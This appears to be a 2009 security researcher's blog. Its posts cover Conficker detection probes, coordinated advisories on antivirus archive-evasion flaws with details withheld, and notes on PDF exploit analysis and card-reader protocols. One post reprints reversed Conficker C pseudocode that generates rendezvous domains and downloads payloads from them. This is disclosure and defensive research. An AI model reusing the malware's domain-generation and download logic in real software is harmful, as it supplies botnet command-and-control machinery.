This just came in: you can scan a network to detect confiker infections due to the way confiker patched the vulnerability.




First and foremost, there is not reason to panic. Confiker will start on April first to scan for C&C command servers and try to download content. Nothing more, nothing less. There may be content on servers, but this is not necessary. It might be that content is pushed on the 14th of april, or the 30 of june, nobody else than the confiker authors know. What is important however is to get rid of your infected machines before this happens.

Network Scanners

Information about conficker.c

Disinfection


Vulnerability Details
How is scanning for infected hosts possible ? :
  • Confiker infects a host through an old vulnerability (MS08-067) that is exposed over MSRPC (NetpwPathCanonicalize function)
  • Confiker patches the vulnerability in memory so nobody else (and itself) can exploit it
  • The in memory patch is different than the official one form Microsoft and exhibits a different reponse to a specific query.
Details :
  • Request server = 'a' * 1 + '\0\0\0' + path = '\x5c\0\x2e\0\x2e\0\x5c\0\0\0\0\0'
  • Answer if infected : Result Par#1 = 0x5c450000 and result Par# 3 =0x00000057
What domains are generated each day ?
  • Uni Bonn has reversed engineered the PRNG for the variants A,B,C
  • Tool and source code can be downloaded here
Have questions related to conficker ? Confiker workgroup

Subscribe to the RSS feed for more updates : RSS

Release mode: Coordinated but limited disclosure.
Ref         : TZO-182009 - Mcafee multiple generic evasions
Vendor      : http://www.mcafee.com      
Status      : Patched
CVE         : CVE-2009-1348 (provided by mcafee)
https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT

Security notification reaction rating : very good
Notification to patch window : +-27 days (Eastern holidays in between)

Disclosure Policy :  http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • McAfee VirusScan® Plus 2009
  • McAfee Total Protection™ 2009
  • McAfee Internet Security
  • McAfee VirusScan USB
  • McAfee VirusScan Enterprise
  • McAfee VirusScan Enterprise Linux
  • McAfee VirusScan Enterprise for SAP
  • McAfee VirusScan Enterprise for Storage
  • McAfee VirusScan Commandline
  • Mcafee SecurityShield for Microsoft ISA Server
  • Mcafee Security for Microsoft Sharepoint
  • Mcafee Security for Email Servers
  • McAfee Email Gateyway
  • McAfee Total Protection for Endpoint
  • McAfee Active Virus Defense
  • McAfee Active VirusScan

It is unkown whether SaaS were affected (tough likely) :
  • McAfee Email Security Service
  • McAfee Total Protection Service Advanced

I. Background
Quote: "McAfee proactively secures systems and networks from known and as yet undiscovered threats worldwide. Home users, businesses, service providers, government agencies, and our partners all trust
our unmatched security expertise and have confidence in our comprehensive and proven solutions to effectively block attacks and prevent disruptions."

II. Description
The parsing engine can be bypassed by a specially crafted and formatted RAR (Headflags and Packsize),ZIP (Filelength) archive.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within RAR and ZIP archives. There is no inspection of the content at all and hence the impossibility to detect malicious code.


IV. Disclosure timeline
DD/MM/YYYY
  • 04/04/2009 : Send proof of concept RAR I, description the terms under which I cooperate and the planned disclosure date
  • 06/04/2009 : Send proof of concept RAR II, description the terms under which I cooperate and the planned disclosure date 
  • 06/04/2009 : Mcafee acknowledges receipt and reproduction of RAR I, acknowledges receipt of RARII 
  • 10/04/2009 : Send proof of concept ZIP I, description the terms under which I cooperate and the planned disclosure date
  • 21/04/2009 : Mcafee provides CVE number CVE-2009-1348 
  • 28/04/2009 : Mcafee informs me that the patch might be released on the 29th
  • 29/04/2009 : Mcafee confirms patch release and provides URL
    https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT 
  • 29/04/2009 : Ask for affected versions
  • 29/04/2009 : Mcafee replies " This issue does affect all vs engine products, including  both gateway and endpoint"

Update 08.05.2009 - CHANGES to original advisory [TZO-172009] Trendmicro :

Status : RAR / CAB issue WILL be patched on June 17

Quoting vendor :
"This vulnerability is capable of allowing attackers to send RAR / CAB with corrupted RAR headers through our gateway products, which bypass the compressed files without scanning them."


Comment:
This just goes to prove that publishing changes perception, as customers read, react and complain. (Trend previously denied patching). In other words, always publish even if the vendor denies
patching.

In the name of all TrendMicro customers I would like to thank those customers that reacted and complained. Without publication there is no change, without those reacting to advisories there is neither.

Proves #2 and #5 at http://blog.zoller.lu/2009/04/dear-thierry-why-are-you-such-arrogant.html
to be valid.





Release mode: Coordinated but limited disclosure.
Ref : TZO-172009 - Trendmicro RAR,CAB,ZIP bypass/evasion
Status : No patch, but mitigation recommendations for certain
products (see below)
BID: http://www.securityfocus.com/bid/34763/references
Vendor : http://www.trendmicro.com/
Security notification reaction rating : Good
Notification to patch time window : n+1 days (no patch)


Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • Client-side products
    These will not be patched, trends reason is that malware will be detected up on extraction. While this is true for end-usersetups this is not the case if you use such products to scan Fileservers, Database servers or any server where an enduser does not actively extract content. The detection is still completely bypassed. In other words you can no longer assume that RAR,ZIP,CAB (or any other archive) is safe/clean after a Trendmicro scan with these products .Hence I can no longer recommend these products for such uses and hence my recommendation to trend to offer patches, if you use the products in such environment please contact Trend and ask for a patch.

    I applaud Trend however for the time and effort spent with communicating with me and the transparency presented.

    Client-side Impact : Low for usage in End-user scenarios
    Client-side Impact : High for usage in fileserver, database scenarios.

  1. OfficeScan product suites (All of OfficeScan products)
  2. ServerProtect product suite (All products of Server protect)
    -ServerProtect for Microsoft Windows/Novell NetWare
    -ServerProtect for EMC Celerra
    -ServerProtect for NetApp
    -Server Protect for Linux
    -ServerProtect for Network Appliance Filers
  3. Trend Micro Internet Security product suites(Internet Security Pro, Internet Security, Antivirus+AntiSpyware)
  4. Client / Server / Messaging Suite ( The OfficeScan component )
  5. Worry Free Business Security - Standard
  6. Worry Free Business Security - Advanced ( The security agent component )
  7. Worry Free Business Security Hosted
  8. Housecall
  • Gateway products
  1. InterScan Web Security Suite product lines and InterScan Web Protect for ISA
    Impact: Detection is evaded but files are quarantined by default ,residual risk of an administrator deblocking a file as there is no detection of malicious code.
  2. InterScan Messaging Security Appliance
    Impact: Detection is evaded but files are quarantined by default, residual risk of an administrator blocking a file as there is no detection of malicious code.
  3. Neatsuite Advanced (combination of InterScan Messaging Security Suite, InterScan Web Security Suite, ScanMail Suite for Domino or Exchange, and All)
    Please see, specific product recommendation
  4. ScanMail for Exchange
    Impact: Protection is bypassed by default
    After mitigation: Residual risk of an administrator deblocking a file as there is no detection of malicious code.

    Mitigation recommendations from Trend:
    1. Set the "Virus Scan > Action > Files outside of scan restriction Criteria" to any of the secured options. Quarantined entire message and set to Notify
    2. The file will be blocked and the Administrator will receive the email notification.

  5. ScanMail for Domino Suites
    Impact: Protection is bypassed by default, detection is also bypassed after mitigation but file is quarantined as "non extractable". After mitigation: Residual risk of an administrator deblocking a file as there is no detection of malicious code.
Mitigation recommendations from Trend:
1. Open the ScanMail for Domino Configuration database
2. Go to Configurations > Policies
3. Double click on Default Mail Scan
4. Click on Scan Options Tab > Scan Restrictions
5. Put a mark on Exceed extracted file size and set this to either of the much secured action
a. Quarantine
b. Delete
6. Put any of the preferred value to maximum extracted file size
7. Click on Save & Closed



I. Background
Quote:"Trend Micro Incorporated is a global leader in network antivirus and Internet content security software and services. Founded in 1988, Trend Micro was a pioneer in secure content and threat management, leading the migration of early virus protection from the desktop to the network server and the Internet gateway. Today, the company continues to advance its comprehensive approach to management of content security threats into the Internet cloud, encompassing information flow beyond the boundaries of the network. With its 24x7 global support operations and dedication to innovative technologies and methodologies, Trend Micro is well positioned to protect its customers against an expanding range of threats that silently endanger business operations, personal information, and property."


II. Description

The parsing engine can be bypassed by a specially crafted and formated ZIP,RAR,CAB archive. Details are currently witheld due to other vendors that are in process of actually deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the CAB archive. There is no inspection of the content at all.

Trendmicro decided to no patch the evasion bugs and proposed mitigation recommendations, the reason given is that doing so would somehow increase the risk of "buffer overflow and BSOD". I am positive that adding more code and increase detection rates is probably going to increase your chances to have such flaws but then again, the goal is to catch as much malware as possible.

This is fine with me as long as customers exactly know what risk they run or don't run when following such recommendations and why other AV vendors simply reduce the amount of trusted input to a minimum
i.e (only parse and intepret the bare minium required to extract content of an archive) instead of giving up. In my point of view the goal of an Anti-virus program is to detect as much malware as possible.


IV. Disclosure timeline
  • 14/03/2009 : Send proof of concept, description the terms under which I cooperate and the planned disclosure date
No reply

  • 16/03/2009 : Resent
No reply

  • 09/04/2009 : Resending, specigying this is the last attempt at responsible disclosure.

No reply

  • 13/04/2009 : Resending, specifying this is the last attempt at responsible disclosure (sic)

  • 13/04/2009 : Trend replies and acknowledges receipt of previous reports.

  • 14/04/2009 : Trend replies that "1. Scan Engine found that modified packed size is greater than archive size during scanning corrupted RAR. 2. Scan Engine didn't force to decompress corrupted archive because to decompress invalid archive could incur unexpected result, for example, buffer overflow and BSOD. [..] 4. The risk of decompressing invalid archive is much high than gateway products pass it when get error code -82 (BAD_ZIP_ERR)" and "virus leak should still not occur because once you decompress the archive, Real-Time scan will still detect the malware once it's extracted out of the corrupted archive." "One concern that we see from this point is that Gateway products won't be able to extract the archive during its scanning phase. (You will have to manually extract the file for IMSx or IWSx to detect the malware).However, as stated earlier we cannot force the extraction of corrupted archives because of other potential issues that could occur. So a workaround would be to configure your gateway solution to or block files wherein the scan result is "uncertain" or when the scan engine returns a specific error code (in this case -82)."

  • 14/04/2009 : Ask trend to reconsider position asuming the files bypass the gateway appliances.
  • 14/04/2009 : Trend replies with more details clarifying that gateways are configured to quarantine such files per default.

  • 14/04/2009 : Ask for clarifications as to product ranges and default configurations
  • 14/04/2009 : Trend confirms that the "Gateteway InterScan Messaging 7.0" products are configured to quaratine these by default and are investigating on the other default configurations. "On Trend Micro desktop products, upon testing with the rar and the cab that you had submitted, the archives will not trigger the scanning component. However once the files are extracted by winrar, winzip or any other archiving software they will be detected by the Trend Micro product before the malicious file can execute."

  • 15/04/2009 : Trendmicro comes back with an detailed list of gateway products and default configurations Trend recommends 2 mitigation configurations for Scanmail product ranges
  • 16/04/2009 : Point out that one of these mitigation configurations opens the gateway to DoS attacks (allow x times the size of compression archive) and ask for a list of affected products.

  • 23/04/2009 : Trend changes the mitigation recommendation for one of the scanmail products

[..] Taking a short cut in the timeline.

  • 29/04/2009 : Release of this advisory

Release mode: Coordinated but limited disclosure.
Ref         : TZO-162009 - Nod32 CAB bypass/evasion
Status      : Patched since Monday 27th (update #4036)
Vendor      : http://www.eset.com/      
Security notification reaction rating : Good
Notification to patch time window : 14 days

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • ESET Smart Security 4 (update #4036)
  • ESET NOD32 Antivirus 4 (update #4036)
  • ESET Smart Security 4 Business Edition (update #4036)
  • ESET NOD32 Antivirus 4 Business Edition (update #4036)
  • ESET NOD32 Antivirus for Exchange Server (update #4036)
  • ESET Mail Security  (update #4036)
  • ESET NOD32 Antivirus for Lotus Domino Server (update #4036)
  • ESET File Security (update #4036)
  • ESET Novell Netware (update #4036)
  • ESET DELL STORAGE SERVERS (update #4036)
  • ESET NOD32 Antivirus for Linux gateway devices (update #4036)

I. Background
ESET develops software solutions that deliver instant, comprehensive protection against evolving computer security threats. ESET NOD32® Antivirus, is the flagship product, consistently achieves the highest accolades in all types of  comparative testing and is the foundational product that builds  out the ESET product line to include ESET Smart Security.

http://www.eset.com/products/eset_performance_advantages.php

II. Description
The parsing engine can be bypassed by a specially crafted and formated CAB archive. Details are currently witheld due to other vendors that are  in process of deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the CAB archive. There is no inspection of the content at all.


IV. Disclosure timeline

  • 13/04/2009 : Send proof of concept, description the terms under which I cooperate and the planned disclosure date
          No reply
  • 17/04/2009 : Resend notification with an indication this will be the last attempt to responsibly disclose.             
  • 17/04/2009 : Eset acknowledges receipt and previous receipt 
  • 29/04/2009 : Eset informs me that the bug was fixed on the 27th of April through and auotmatic update (update #4036)
  • 29/04/2009 : Release of this advisory


Update: The information displayed on Aladdin blog post is erroneous, the end-user is able to extract the file. Still working with Aladdin on the issue



Release mode: Forced release, vendor has not replied.

Ref : TZO-152009 - Aladdin eSafe Generic Evasion
Status : Not patched
Vendor : http://www.aladdin.com
Security notification reaction rating : Catastrophic
(vendor visited specific url at my website but has not reacted)

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :
- t.b.a (Vendor has not reacted, please see below)
- probably all versions including gateway solutions

As this bug has not been reproduced by the vendor, this limited advisory relies on the assumption that my tests were conclusive and that the test environment mimics the production environment.

I. Background
Quote: "Aladdin is dedicated to being the leading provider of security services and solutions used to protect digital assets, enable secure business, and maximize the benefits from creating, selling, distributing and using digital content."


II. Description
The parsing engine can be bypassed by a specially crafted and formatted archive file. Details are currently withheld due to other vendors that are in process of deploying patches.

A professional reaction to a vulnerability notification is a way to measure the maturity of a vendor in terms of security. Aladdin is given a grace period of two (2) weeks to reply to my notification. Failure to do so will result in POC being released in two (2) weeks.

Aladdin is advised to leave a specific security contact at [1] in order to simplify getting in contact with them.

As this bug has not been reproduced by the vendor, this limited advisory relies on the assumption that my tests were conclusive.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at : http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the archive. There is no inspection of the content at all.


IV. Disclosure timeline
DD/MM/YYYY
  • 04/04/2009 : Send proof of concept, description the terms under which I cooperate and the planned disclosure date. There is no security adress listed at [1] and hence took previously known security contacts that are known to exist.
No reply.

  • 13/04/2009 : Resending. Copied security@aladdin.de, security@aladdin.com secure@aladdin.com, secure@aladdin.de,support@aladdin.com, support@aladdin.de in CC.
No reply.

  • 16/04/2009 : Resending specifying this is the last attempt to disclose reponsibly.
No reply.

  • 18/04/2009 : Online virus scan service offered to bridge the gap between AV vendors that don't reply and myself. Aladdin was contacted through this third party.
No reaction

No reaction
  • 27/04/2009 : Release of this limited advisory and begin of grace period.

  • 27/04/2009 : Aladdin got in contact and are already working on the issue


[1] http://osvdb.org/vendor/1/Aladdin%20Knowledge%20Systems

Release mode: Coordinated but limited disclosure.
Ref : TZO-142009 - Comodo evasion RAR
Vendor : http://www.comodo.com
Status : Patched
Security notification reaction rating : Good
Notification to patch window : 41 days

Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • Comodo Internet Security 3.5.x and 3.8.x (Impact low due to on access scan)
  • Comodo Anti-Virus (Impact low due to on access scan)
I. Background
Quote: "Comodo's range of solutions gives businesses the ability to create online trust through proprietary technology that help e-businesses convert more customers, retain more customers and increase lifetime value."

II. Description
The parsing engine can be bypassed by a specially crafted and formated RAR archive. Details are currently witheld due to other vendors that are in process of deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the RAR archive. There is no inspection of the content at all and hence the impossibility to detect malicious code.


IV. Disclosure timeline
DD/MM/YYYY
  • 14/03/2009 : Send proof of concept, description the terms under which I cooperate and the planned disclosure date
No reply

  • 16/03/2009 : Resend notification

  • 23/03/2009 : Comodo answers that the bug has been fixed and will be deployed in version 3.9 due in end of april.

  • 02/04/2009 : Ask for affected versions.

  • 02/04/2009 : Comodo answers that the ranges 3.5.x and 3.8.x have been affected and that the sheduled release date is the 25th of April. Credit will be given in the release notes.

  • 27/04/2009 : Notify comodo that I plan to release the advisory today and assume the production code has been released in the 25.04.2009

  • 27/04/2009 : Release of this advisory

Release mode: Coordinated but limited disclosure.
Ref : TZO-132009 - Avira Antivir evasion ZIP
Vendor : http://www.avira.com
Status : Patched
Security notification reaction rating : Good
Notification to patch window : 7 days (Eastern holidays in between)

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :
  • Avira AntiVir Free (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Premium (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Premium Security Suite (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Professional (Desktop) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Exchange (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir SharePoint (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir ISA Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir MIMEsweeper (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir for KEN! 4 (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
  • Avira AntiVir Professional (Unix) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Server (Unix) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir MailGate (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir WebGate (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)

I. Background

Quote: "Avira AntiVir is a reliable free antivirus solution, that constantly and rapidly scans your computer for malicious programs such as viruses, Trojans, backdoor programs, hoaxes, worms, dialers etc. Monitors every action executed by the user or the operating system and reacts promptly when a malicious program is detected.

The protection experts have numerous company locations throughout Germany and cultivate partnerships in Europe, Asia and America. Avira has more than 180 employees at their main office in Tettnang near Lake Constance and is one of the largest employers in the region. There are around 250 people employed worldwide whose commitment is continually being confirmed by awards. A significant contribution to protection is the Avira AntiVir Personal which is being used by private users a million times over.

AV-Comparatives e.V. have chosen Avira AntiVir Premium as the best anti-virus solution of 2008"


II. Description
The parsing engine can be bypassed by a specially crafted and formated CAB archive. Details are currently witheld due to other vendors that are in process of deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the CAB archive. There is no inspection of the content at all and hence the impossibility to detect malicious code.
Link

IV. Disclosure timeline
DD/MM/YYYY
  • 10/04/2009 : Send proof of concept, description the terms under which I cooperate and the planned disclosure date

  • 10/04/2009 : Avira acknowledges receipt and informs me of the eastern holidays in Germany.

  • 16/04/2009 : Asked for update

  • 17/04/2009 : Avira replies the problem is fixed in "AVPack >= 8.1.3.14 7.6.1.19", changes have been made to the sdk in order to allow 3rd party AV vendors that use the engine to reveive more details about the file.

  • 18/04/2009 : Avira informs me that the patch is in production since the 17th of April. AV7 7.9.0.148 / AV8/9: 8.2.0.148

  • 18/04/2009 : Ask for more details about the impact of gateway appliances

  • 23/04/2009 : Avira states that the archive effectively evade the default configuration of Avira AntiVir MailGate and Avira AntiVir WebGate (prior to patch). Future evasions can be blocked by setting "BlockSuspiciousArchive" to yes however this is not enabled by default.

  • 27/04/2009 : Release of this advisory

In cryptography a simple but important rule applies, only open, documented and peer reviewed encryption schemes shall be used. The reason is simple, it is very hard to develop a new algorithm that is resistant against attacks, developing a new custom algorithm and keeping it undisclosed is a clear sign the vendor/author has not understood the basic principles of cryptography.

In other words : Don't use custom (i.e "we developed our own algorithm") ciphers. Never. A cryptography algorithm that relies on obscurity and secrecy about the algorithm itself,doesn't add to it's security, it diminishes it considerably. The only parties that have a genuine interest in these are three letter agencies.

The MIFARE fiasco proves this simple principle one more time, add LM, Bluetooth and DECT to the list. Maybe. Maybe?

The authors of the paper linked below do not believe in coincidence, particularly the way certain MIFARE cards were set-up, their weaknesses might have been introduced entirely on purpose. (Read: Backdoor)

The paper "The Dark side of security by Obscurity" goes into more detail about the mifare fiasco : http://www.want2pay.com/mifarebug.pdf (via FEFE)

Usb write blocker is a small tool I created yesterday, it sets the registry keys to block write requests to USB devices. Comes usefull in several cases, in my case an unamed AV Software insisted on deleting my fuzz samples. Requires .NET 2.0 Framework.

Download USB Write Blocker













The respective registry key and value is :
Rootkey : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Subkey : StorageDevicePolicies
Key : Writeprotect (Boolean)


Release mode: Coordinated.
Ref : TZO-122009- SUN Java remote code execution
Vendor : http://www.sun.com

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html


Affected Products:
- JVM Version 6 Update 1
- JVM Version 6 Update 2

I. Background
Dictionary.com : "The Java Virtual Machine (JVM) is software that converts the Java intermediate language (bytecode) into machine language and executes it. The original JVM came from the JavaSoft division of Sun. Subsequently, other vendors developed their own; for example, the Microsoft Virtual Machine is Microsoft's Java interpreter. A JVM is incorporated into a Web browser in order to execute Java applets. A JVM is also installed in a Web server to execute server-side Java programs. A JVM can also be installed in a client machine to run stand-alone Java applications."

II. Description
Please understand that no details will be given, too many bad guys would use it for drive-by attacks. At this point in time (old + fixed) there is really no need to.


III. Impact
Memory corruption due to a write attempt to a user controlable offset. i.e exploitable. The Java VM is reachable through every major browser.


IV. Disclosure timeline

  • 19/11/2008 : Send proof of concept, description to Microsoft (sic), as bug was triggered through IE.
  • 20/11/2008 : Microsoft asks for clarification
  • 21/11/2008 : Clarification sent.
  • 12/12/2008 : Microsoft replicated the memory corruption in Version 6 update 1 and recommends getting in contact with SUN

  • 12/12/2008 : Send proof of concept and description to SUN

  • 16/12/2008 : Sun acknwoledges receipt. PGP keys are exchanged.

  • 13/01/2009 : Asked for update from SUN

  • 17/01/2009 : Asked for update and indicate this is the last request prior to release if no answer is given.

  • 12/03/2009 : SUN asks for more specific details

  • 12/03/2009 : Details given

  • 24/04/2009 : Notify SUN that I am drafting the advisory and would require feedback and details

  • 24/04/2009 : SUN asks for a copy of the advisory and explains the engineering team is still working on the case

  • 07/04/2009 : Asks SUN for an update

  • 08/04/2009 : Sun responds that the team is still working on the case

  • 20/04/2009 : Asking for an update and details

  • 20/04/2009 : SUN responds that the engineers could not reproduce in Update 11 and 12

  • 20/04/2009 : I test the new updates and can no longer reproduce the issue

  • 22/04/2009 : Release of this advisory

For those not in the know : Conficker is one of the largest Worm botnets in existance, and conficker is the name attributed to the piece of malware used to create the botnet.

Conficker C uses a PRNG to generate a list of possible of rendez-vous points, in essence this are domain names (hosts) that have additional information and code to download. After the "fiasco" of having all their pseudo randomly generated domain names registered or blocked, the new conficker C variant, improved upon it's design. Conficker C now generates 50.000 possible combinations per day and adds the resulting string to 110 TLD.

Update : Confiker disinfection, Network scanners and more

Interestingly among the possible TLD is also Luxembourg (LU) domain. It will be interesting to see if it will be used and how Restena (the main registrar) will react. My guess it that they will most likely not succeed in getting their LU domain, since the back-end process is entirely manual (afaik).


So if somebody from restena is reading this post, if you get a request to register a random domain name like yxsdsdfsfd.lu you should react by informing your 2nd tier registrar that something might be fishy (appropriate noun in this case) and manualy verify a contact name and phone number prior to handing out the domain.
PS: Having not seen the PRNG, it might be totaly possible that a more meaningfull domain than random characters might be generated once in a while.


More Information : Excellent technical backround about Conficker C from SRI

The code used to generate the domain names is :


int domain_name_generation()
{
// local declarations
hMem = 0;
check_if_MS_DEF_PROV();
get_time_from_popular_web_sites();
// baidu.com, google.com, yahoo.com, ask.com, w3.org, // facebook.com, imageshack.us, rapidshare.com

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
{
while ( 1 )
{
counter_domains = counter;
if ( counter >= 50000 )
break;

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars

// append "." at the end of the name
random = DGA_random_function();
strcat(*end_of_random_name, (&array_top_domains)[4 * random % 116]);
// append to the name one of the 116 top domain names
++counter;
}

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
{
// random number modulo 50,000
one_in_50000_names =
conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
{
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
{
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
{
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
{
is_blacklisted_ip =
check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
{
found = 0;
index = 0;
while (index < counter_domains )
{
if (host_address == array_previously_checked_IPs[index] )
{
found = 1;
break; // break if IP has been previously encountered
}
++index;
}
// skip if IP has been previously encountered
if ( !found )
{
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
}
}
}
}
}
}
Sleep(...); // sleep small random amount
++counter_domains;
}
}
GlobalFree(hMem);
return success_download;
}

Came across this interesting paper from ARTeam (Shub-Nigurrath), in case you are now in the PDF paranoia fraction I mirrored the PDF below in Flash, you might want to click the fullscreen button.

Download





Update: I figured that there is some interest in these collections, as such I will regularly update this page.

I have been asked to provide some information on analyzing and reversing PDF and DOC exploits, here are some hints where to look and how to do it :


PDF

Office filesSandbox Analysis :
  • CWSandbox is able to analyse PDF files as of 12/2008. It does so by opening the pdf file in an old 8.x version and monitoring various changes. Link
  • Anubis is able to analyse PDF/Flash and Websites. It does so by using IE and Acrobat reader and monitor changes. Link
Recommended PDF viewer :
Recommended gateway policy for fruity targets within your Enterprise
  • Convert all ingress PDF to picture files (TIFF - fax files), the resulting file will have all the pages in a single TIFF. Note: the standard windows viewer allows for persitent commenting, annotations, highlights etc.
  • Example with ghostscript : gs -q -sDEVICE=tifflzw -dBATCH -dNOPAUSE -r120 -sOutputFile=OUTPUTFILE.tiff INPUTFILE.pdf 2>&1
  • P.S: Normal rules apply, don't assume GS parser to be 100% safe

Jabra pulls a 1994 microsoft reaction in the year 2009. "The vulnerability is purely theoretical". I thought we were over this.

Jabra claims that the cipher is so resistant that it would take a huge amount of effort. Jabra, do us all a favor and google for "downgrade attack". No need to break anything if you agree to not use encryption (or 0bit key) - see SSL v.2.o

http://uswww03.gnnetcom.com/jabra/cc_stream/white/DECT_Security.pdf

Credit: Security4all tweet

Update:RPW pointed out that thedocument is from 2007 not from 2009, oops ;)


History
▪ Part 1 - Omron hybrid card reader - New toy
▪ Part 2 - Omron hybrid card reader protocol partly reversed
▪ Part 3 - Demo of implementation (This one)



FYI : 2 Readers are still up for sale on ebay : here and here
Official Product page is here

About: Hitachi Omrons Card readers are used in various commercial setups. Identity management, payement systems, parking systems are a few of these. The effort displayed on this blog is purely done out of research and awareness purposes. The "bad guys"a lot more advanced and will not require information displayed within here.

I recently implemented the barebone protocol and functions to read out ISO Track 1+2+3. I will briefly dive into the protocol in this post for those interested. The protocol itself is pretty simple, though bad specifications make it a pain to implement correctly.

Brief how-to:
▪ To initialize the reader for use connect to RS232 port (or a virtual usb com port as in my case) and send the DTR signal. Failure to send the DTR signal will result in no answer to commands and a non-functioning device.
▪ The session (protocol flow) works as described in Figure 2 below. First we send our command in hexadecimal following the syntax described by Figure 1 :

Figure 1

You might ask yourself what the heck DLE stands for, DLE (Data Link Escape) is a control character within ASCII, specificaly it is 16 and 0x10, ETX (End of TeXt) = 0x03 ASCI 4.

Following the diagram above the sequence to send would be :
<DLE><STX>COMMAND HERE<DLE><ETX>BCC

What the hell is BCC then, BCC is the checksum/parity Hitachi introduced into the protocol, the documentation is a bit unclear about how exactly to proceed here's is the correct way :

Each byte from the command is to be XORed with each other, then XOR with ETX (0x03).

Example (BCC calc):
▪ 10 02 43 32 30 10 03 42
▪ DLE STX C 6 0 DLE ETX BCC
BCC = 43 XOR 32 XOR 30 XOR 03 = 42

Figure 2

Figure 2 shows the protocol handshaking taking place :
1. Host sends command
2. Device acknowledges the receipt with DLE ACK
3. Host sends the enquiry command with DLE ENQ
4. Device sends the reponse to the command

Here is a video of the C# prototype working on a VISA card (Click the full screen icon to get the details) :

Lots of voices were heard that they will drop Adobe acrobat in favor for the free FoxitPDFreader, well this simple Remote code execution vulnerability still works with Foxit as of today :


PS. I love SumatraPDF

Websense believes this blog to be malicious and hence is blocking it, similar to Sonicwall.



Thanks to Steichen P. and Patrick Dardar for the notification, contacted Websense.

Update: Nicolas Brulez (the man) was kind enough to investigate, it apparently matched an exploit signature and is currently in the "remove from the ban list" queue. Thank you Nico!